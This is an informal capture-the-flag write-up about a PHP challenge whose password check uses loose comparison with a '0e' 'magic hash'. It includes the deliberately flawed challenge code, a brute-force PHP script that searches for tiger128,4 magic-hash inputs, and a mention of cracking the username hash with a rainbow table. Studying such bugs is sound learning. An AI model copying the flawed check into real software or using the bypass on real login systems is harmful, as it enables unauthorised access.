source code were provided
<?php
if (isset($_GET['username']) and isset($_GET['password'])) {
if (hash("tiger128,4", $_GET['username']) != "51c3f5f5d8a8830bc5d8b7ebcb5717df") {
echo "Invalid username";
}
else if (hash("tiger128,4", $_GET['password']) == "0e132798983807237937411964085731") {
$flag = fopen("flag.txt", "r") or die("Cannot open file");
echo fread($flag, filesize("flag.txt"));
fclose($flag);
}
else {
echo "Try harder";
}
}
else {
echo "Invalid parameters";
}
?>
I can tell this is testing us on the PHP Loose Comparison
PHP String comparison vulnerabilities
Essentially, in this case. the password is being compared to 0e132798983807237937411964085731, in the BEST PROGRAMMING LANGUAGE PHP, the hash will simply be treated as a float.
which means. 0e132798983807237937411964085731 == 0e111 will yield True . So let's try to generate a hash using tiger128,4 hash function that was a built-in hash function in PHP. I was trying to see if I can use a python script for it, since I am not very familiar with PHP scripting lol. PS: I can read it just fine.....
But I quickly came up with a slow, but working php script.
<?php
$x = 1;
while(true) {
$test=hash('tiger128,4',strval($x));
if(substr($test, 0,2) ==="0e" and is_numeric(substr($test,2))){
echo $x;
echo "\\n";
}
$x++;
}
?>
/* it might take longer than 5mins */
afterward, we need to manually test our x with the echo hash('tiger128,4',strval($x)); and making sure our final hash are in format of 0e[1-9]+ Ex.
Will not work. Eventually, we got something that will fits our need.
We already solved the hardest part. So let's also 'crack' the username hash. 51c3f5f5d8a8830bc5d8b7ebcb5717df
Hash tiger128,4: 51c3f5f5d8a8830bc5d8b7ebcb5717df
A quick rainbow table lookup will do the trick!
So we got our creds.
